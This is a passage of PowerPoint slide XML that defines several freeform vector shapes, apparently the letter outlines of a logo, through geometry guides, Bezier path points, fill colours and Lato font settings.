                <a:gd name="connsiteY0" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 360997"/>
                <a:gd name="connsiteY1" fmla="*/ 136208 h 272415"/>
                <a:gd name="connsiteX2" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY2" fmla="*/ 272415 h 272415"/>
                <a:gd name="connsiteX3" fmla="*/ 274320 w 360997"/>
                <a:gd name="connsiteY3" fmla="*/ 137160 h 272415"/>
                <a:gd name="connsiteX4" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX5" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY5" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX6" fmla="*/ 56198 w 360997"/>
                <a:gd name="connsiteY6" fmla="*/ 136208 h 272415"/>
                <a:gd name="connsiteX7" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY7" fmla="*/ 52388 h 272415"/>
                <a:gd name="connsiteX8" fmla="*/ 218123 w 360997"/>
                <a:gd name="connsiteY8" fmla="*/ 137160 h 272415"/>
                <a:gd name="connsiteX9" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY9" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX10" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY10" fmla="*/ 267653 h 272415"/>
                <a:gd name="connsiteX11" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY11" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX12" fmla="*/ 262890 w 360997"/>
                <a:gd name="connsiteY12" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX13" fmla="*/ 262890 w 360997"/>
                <a:gd name="connsiteY13" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX14" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY14" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX15" fmla="*/ 320040 w 360997"/>
                <a:gd name="connsiteY15" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX16" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY16" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX17" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY17" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX18" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY18" fmla="*/ 215265 h 272415"/>
                <a:gd name="connsiteX19" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY19" fmla="*/ 267653 h 272415"/>
                <a:gd name="connsiteX20" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY20" fmla="*/ 267653 h 272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0997" h="272415">
                  <a:moveTo>
                    <a:pt x="137160" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61913" y="0"/>
                    <a:pt x="0" y="60960"/>
                    <a:pt x="0" y="136208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="211455"/>
                    <a:pt x="60960" y="272415"/>
                    <a:pt x="137160" y="272415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212407" y="272415"/>
                    <a:pt x="274320" y="211455"/>
                    <a:pt x="274320" y="137160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273368" y="60008"/>
                    <a:pt x="213360" y="0"/>
                    <a:pt x="137160" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="137160" y="220028"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80963" y="220028"/>
                    <a:pt x="56198" y="171450"/>
                    <a:pt x="56198" y="136208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56198" y="100965"/>
                    <a:pt x="80963" y="52388"/>
                    <a:pt x="137160" y="52388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196215" y="52388"/>
                    <a:pt x="218123" y="104775"/>
                    <a:pt x="218123" y="137160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218123" y="171450"/>
                    <a:pt x="192405" y="220028"/>
                    <a:pt x="137160" y="220028"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="304800" y="267653"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304800" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262890" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262890" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320040" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="215265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="267653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="267653"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00B3E7"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="589" name="Freeform: Shape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F585DF-8E74-BE4E-189C-FD7DE6A05C0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4488107" y="1766793"/>
              <a:ext cx="865822" cy="263842"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY0" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX1" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY1" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX2" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY2" fmla="*/ 210503 h 263842"/>
                <a:gd name="connsiteX3" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY3" fmla="*/ 210503 h 263842"/>
                <a:gd name="connsiteX4" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY4" fmla="*/ 157163 h 263842"/>
                <a:gd name="connsiteX5" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY5" fmla="*/ 157163 h 263842"/>
                <a:gd name="connsiteX6" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY6" fmla="*/ 104775 h 263842"/>
                <a:gd name="connsiteX7" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY7" fmla="*/ 104775 h 263842"/>
                <a:gd name="connsiteX8" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY8" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX9" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY9" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX10" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX11" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX12" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY12" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX13" fmla="*/ 123825 w 865822"/>
                <a:gd name="connsiteY13" fmla="*/ 164783 h 263842"/>
                <a:gd name="connsiteX14" fmla="*/ 60008 w 865822"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 865822"/>
                <a:gd name="connsiteY15" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX16" fmla="*/ 105728 w 865822"/>
                <a:gd name="connsiteY16" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX17" fmla="*/ 140970 w 865822"/>
                <a:gd name="connsiteY17" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX18" fmla="*/ 246698 w 865822"/>
                <a:gd name="connsiteY18" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX19" fmla="*/ 187643 w 865822"/>
                <a:gd name="connsiteY19" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX20" fmla="*/ 123825 w 865822"/>
                <a:gd name="connsiteY20" fmla="*/ 164783 h 263842"/>
                <a:gd name="connsiteX21" fmla="*/ 720090 w 865822"/>
                <a:gd name="connsiteY21" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX22" fmla="*/ 624840 w 865822"/>
                <a:gd name="connsiteY22" fmla="*/ 252413 h 263842"/>
                <a:gd name="connsiteX23" fmla="*/ 565785 w 865822"/>
                <a:gd name="connsiteY23" fmla="*/ 169545 h 263842"/>
                <a:gd name="connsiteX24" fmla="*/ 627698 w 865822"/>
                <a:gd name="connsiteY24" fmla="*/ 87630 h 263842"/>
                <a:gd name="connsiteX25" fmla="*/ 601980 w 865822"/>
                <a:gd name="connsiteY25" fmla="*/ 22860 h 263842"/>
                <a:gd name="connsiteX26" fmla="*/ 530543 w 865822"/>
                <a:gd name="connsiteY26" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX27" fmla="*/ 444818 w 865822"/>
                <a:gd name="connsiteY27" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX28" fmla="*/ 444818 w 865822"/>
                <a:gd name="connsiteY28" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX29" fmla="*/ 500063 w 865822"/>
                <a:gd name="connsiteY29" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX30" fmla="*/ 500063 w 865822"/>
                <a:gd name="connsiteY30" fmla="*/ 171450 h 263842"/>
                <a:gd name="connsiteX31" fmla="*/ 565785 w 865822"/>
                <a:gd name="connsiteY31" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX32" fmla="*/ 678180 w 865822"/>
                <a:gd name="connsiteY32" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX33" fmla="*/ 699135 w 865822"/>
                <a:gd name="connsiteY33" fmla="*/ 209550 h 263842"/>
                <a:gd name="connsiteX34" fmla="*/ 785813 w 865822"/>
                <a:gd name="connsiteY34" fmla="*/ 209550 h 263842"/>
                <a:gd name="connsiteX35" fmla="*/ 806768 w 865822"/>
                <a:gd name="connsiteY35" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX36" fmla="*/ 865823 w 865822"/>
                <a:gd name="connsiteY36" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX37" fmla="*/ 765810 w 865822"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX38" fmla="*/ 720090 w 865822"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX39" fmla="*/ 515303 w 865822"/>
                <a:gd name="connsiteY39" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX40" fmla="*/ 501015 w 865822"/>
                <a:gd name="connsiteY40" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX41" fmla="*/ 501015 w 865822"/>
                <a:gd name="connsiteY41" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX42" fmla="*/ 528638 w 865822"/>
                <a:gd name="connsiteY42" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX43" fmla="*/ 572453 w 865822"/>
                <a:gd name="connsiteY43" fmla="*/ 87630 h 263842"/>
                <a:gd name="connsiteX44" fmla="*/ 515303 w 865822"/>
                <a:gd name="connsiteY44" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX45" fmla="*/ 717233 w 865822"/>
                <a:gd name="connsiteY45" fmla="*/ 158115 h 263842"/>
                <a:gd name="connsiteX46" fmla="*/ 741998 w 865822"/>
                <a:gd name="connsiteY46" fmla="*/ 86678 h 263842"/>
                <a:gd name="connsiteX47" fmla="*/ 766763 w 865822"/>
                <a:gd name="connsiteY47" fmla="*/ 158115 h 263842"/>
                <a:gd name="connsiteX48" fmla="*/ 717233 w 865822"/>
                <a:gd name="connsiteY48" fmla="*/ 158115 h 26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865822" h="263842">
                  <a:moveTo>
                    <a:pt x="260985" y="262890"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412433" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260985" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260985" y="262890"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="123825" y="164783"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="109538" y="128588"/>
                    <a:pt x="60008" y="0"/>
                    <a:pt x="60008" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105728" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140970" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187643" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187643" y="0"/>
                    <a:pt x="138113" y="128588"/>
                    <a:pt x="123825" y="164783"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="720090" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="624840" y="252413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565785" y="169545"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="591503" y="162878"/>
                    <a:pt x="627698" y="141923"/>
                    <a:pt x="627698" y="87630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627698" y="61913"/>
                    <a:pt x="618173" y="38100"/>
                    <a:pt x="601980" y="22860"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584835" y="6668"/>
                    <a:pt x="562928" y="0"/>
                    <a:pt x="530543" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="444818" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444818" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500063" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500063" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565785" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678180" y="263843"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="678180" y="263843"/>
                    <a:pt x="690563" y="231458"/>
                    <a:pt x="699135" y="209550"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="785813" y="209550"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="794385" y="231458"/>
                    <a:pt x="806768" y="263843"/>
                    <a:pt x="806768" y="263843"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="865823" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765810" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720090" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="515303" y="125730"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="501015" y="125730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501015" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528638" y="52388"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="561023" y="52388"/>
                    <a:pt x="572453" y="70485"/>
                    <a:pt x="572453" y="87630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="572453" y="97155"/>
                    <a:pt x="572453" y="125730"/>
                    <a:pt x="515303" y="125730"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="717233" y="158115"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="726758" y="132398"/>
                    <a:pt x="738188" y="99060"/>
                    <a:pt x="741998" y="86678"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="766763" y="158115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717233" y="158115"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="590" name="Freeform: Shape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F26276C-31F4-DD21-EA1B-F2D91C4099AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6156886" y="1766793"/>
              <a:ext cx="151447" cy="262890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY0" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX1" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 151447"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 151447"/>
                <a:gd name="connsiteY3" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX4" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY4" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX5" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY5" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX6" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY6" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX7" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY7" fmla="*/ 157163 h 262890"/>
                <a:gd name="connsiteX8" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY8" fmla="*/ 157163 h 262890"/>
                <a:gd name="connsiteX9" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY9" fmla="*/ 103823 h 262890"/>
                <a:gd name="connsiteX10" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY10" fmla="*/ 103823 h 262890"/>
                <a:gd name="connsiteX11" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY11" fmla="*/ 52388 h 262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447" h="262890">
                  <a:moveTo>
                    <a:pt x="151448" y="52388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="151448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="103823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="103823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="52388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="591" name="Freeform: Shape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A403C1-F60C-6B84-E2AE-AB9430E3DC31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334879" y="1762031"/>
              <a:ext cx="263842" cy="272415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY0" fmla="*/ 52388 h 272415"/>
                <a:gd name="connsiteX1" fmla="*/ 195263 w 263842"/>
                <a:gd name="connsiteY1" fmla="*/ 82868 h 272415"/>
                <a:gd name="connsiteX2" fmla="*/ 199073 w 263842"/>
                <a:gd name="connsiteY2" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX3" fmla="*/ 203835 w 263842"/>
                <a:gd name="connsiteY3" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX4" fmla="*/ 263842 w 263842"/>
                <a:gd name="connsiteY4" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX5" fmla="*/ 255270 w 263842"/>
                <a:gd name="connsiteY5" fmla="*/ 71438 h 272415"/>
                <a:gd name="connsiteX6" fmla="*/ 215265 w 263842"/>
                <a:gd name="connsiteY6" fmla="*/ 25718 h 272415"/>
                <a:gd name="connsiteX7" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 263842"/>
                <a:gd name="connsiteY8" fmla="*/ 135255 h 272415"/>
                <a:gd name="connsiteX9" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY9" fmla="*/ 272415 h 272415"/>
                <a:gd name="connsiteX10" fmla="*/ 254317 w 263842"/>
                <a:gd name="connsiteY10" fmla="*/ 202883 h 272415"/>
                <a:gd name="connsiteX11" fmla="*/ 262890 w 263842"/>
                <a:gd name="connsiteY11" fmla="*/ 187643 h 272415"/>
                <a:gd name="connsiteX12" fmla="*/ 197167 w 263842"/>
                <a:gd name="connsiteY12" fmla="*/ 187643 h 272415"/>
                <a:gd name="connsiteX13" fmla="*/ 194310 w 263842"/>
                <a:gd name="connsiteY13" fmla="*/ 191453 h 272415"/>
                <a:gd name="connsiteX14" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY14" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX15" fmla="*/ 55245 w 263842"/>
                <a:gd name="connsiteY15" fmla="*/ 135255 h 272415"/>
                <a:gd name="connsiteX16" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY16" fmla="*/ 52388 h 272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3842" h="272415">
                  <a:moveTo>
                    <a:pt x="135255" y="52388"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169545" y="52388"/>
                    <a:pt x="188595" y="74295"/>
                    <a:pt x="195263" y="82868"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199073" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203835" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263842" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255270" y="71438"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="248602" y="60008"/>
                    <a:pt x="239077" y="42863"/>
                    <a:pt x="215265" y="25718"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183832" y="2858"/>
                    <a:pt x="148590" y="0"/>
                    <a:pt x="135255" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60960" y="0"/>
                    <a:pt x="0" y="60960"/>
                    <a:pt x="0" y="135255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210503"/>
                    <a:pt x="60960" y="272415"/>
                    <a:pt x="135255" y="272415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184785" y="272415"/>
                    <a:pt x="229552" y="246698"/>
                    <a:pt x="254317" y="202883"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="262890" y="187643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197167" y="187643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194310" y="191453"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179070" y="209550"/>
                    <a:pt x="157163" y="220028"/>
                    <a:pt x="135255" y="220028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92392" y="220028"/>
                    <a:pt x="55245" y="180975"/>
                    <a:pt x="55245" y="135255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54292" y="89535"/>
                    <a:pt x="90488" y="52388"/>
                    <a:pt x="135255" y="52388"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="592" name="Freeform: Shape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A862800E-049F-4215-C0DC-6390C3B758F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5986389" y="1766793"/>
              <a:ext cx="148589" cy="262890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY2" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX3" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY3" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX4" fmla="*/ 93345 w 148589"/>
                <a:gd name="connsiteY4" fmla="*/ 132398 h 262890"/>
